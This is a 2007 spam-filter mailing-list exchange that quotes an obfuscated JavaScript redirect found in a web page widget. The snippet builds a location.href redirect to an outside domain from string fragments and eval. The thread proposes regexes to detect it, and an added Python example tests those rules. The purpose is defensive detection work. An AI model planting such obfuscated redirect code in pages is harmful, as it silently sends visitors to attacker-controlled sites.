John D. Hardin wrote:
On Wed, 14 Mar 2007, Daryl C. W. O'Shea wrote:
Anyway... this is the redirect code they're using:
<div class='widget-content'>
<script>yvxj = "ef=";kacm = "ttp://";apgy = "fe";ioo = "'h";usf =
"ershikin";uos = ".";iaswx = "inj";bdj = "com'";rpul = "l";fgbww =
"nhu";wnx = "ocation.
hr";jftrg = rpul + wnx + yvxj + ioo + kacm + apgy + fgbww + iaswx + usf
+ uos + bdj; eval(jftrg); </script>
</div>
Quick and dirty, a regex that would work for a Web-Redirect header rule:
/( \+ [a-z]{1,6}){4}; eval\([a-z]{1,6}\); <\/script>/
How about a much simpler rule that just adds 100 points for any mail
with a <script> tag? Javascript has no place in email.
Aside from the regex being intended for use in a Web-Redirect header
rule, such a rule (that instead matches <script> tags in email) wouldn't
be so simple if you want to avoid legit emails, such as this one or any
other mail talking about javascript.
Daryl
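
The trade-off discussed in this thread, as an added example that is not part of the original messages: the posted regex is run over constructed sample text next to a bare `<script>` match. `NAIVE_SCRIPT_RE`, `TOLERANT_RE` and all sample strings are assumptions made for illustration, and the domain is a placeholder.

```python
import re

# Regex as posted in the thread, with the Perl /.../ delimiters dropped.
REDIRECT_RE = re.compile(r"( \+ [a-z]{1,6}){4}; eval\([a-z]{1,6}\); <\/script>")

# Assumption: the "any <script> tag" idea from the reply, written as a regex.
NAIVE_SCRIPT_RE = re.compile(r"<script\b", re.IGNORECASE)

# Assumption: same shape as the posted regex, but tolerant of line wraps
# and other whitespace runs between the concatenated variables.
TOLERANT_RE = re.compile(
    r"(\s+\+\s+[a-z]{1,6}){4};\s*eval\([a-z]{1,6}\);\s*</script>"
)

# Constructed sample: a page body that builds a redirect from string
# fragments and evals it, in the style of the snippet quoted above.
REDIRECT_PAGE = (
    "<div class='widget-content'>"
    '<script>ab = "loca";cd = "tion.h";ef = "ref=\'ht";gh = "tp://exam";'
    'ij = "ple.invalid\'";kl = ab + cd + ef + gh + ij; eval(kl); </script>'
    "</div>"
)

# Constructed sample: the same body after a line wrap lands inside the
# concatenation, as happens when the code is pasted into a mail.
WRAPPED_PAGE = REDIRECT_PAGE.replace(" + gh", "\n+ gh")

# Constructed sample: a legitimate mail that only talks about the tag.
LEGIT_MAIL = (
    "Javascript has no place in email, so why not add 100 points "
    "for any mail with a <script> tag?"
)


def classify(text):
    """Return which of the three patterns fire on the given text."""
    return {
        "posted": bool(REDIRECT_RE.search(text)),
        "naive": bool(NAIVE_SCRIPT_RE.search(text)),
        "tolerant": bool(TOLERANT_RE.search(text)),
    }


if __name__ == "__main__":
    for name in ("REDIRECT_PAGE", "WRAPPED_PAGE", "LEGIT_MAIL"):
        print(name, classify(globals()[name]))
```

The posted regex depends on single spaces between tokens, so it is best applied to content whose whitespace has not been rewrapped.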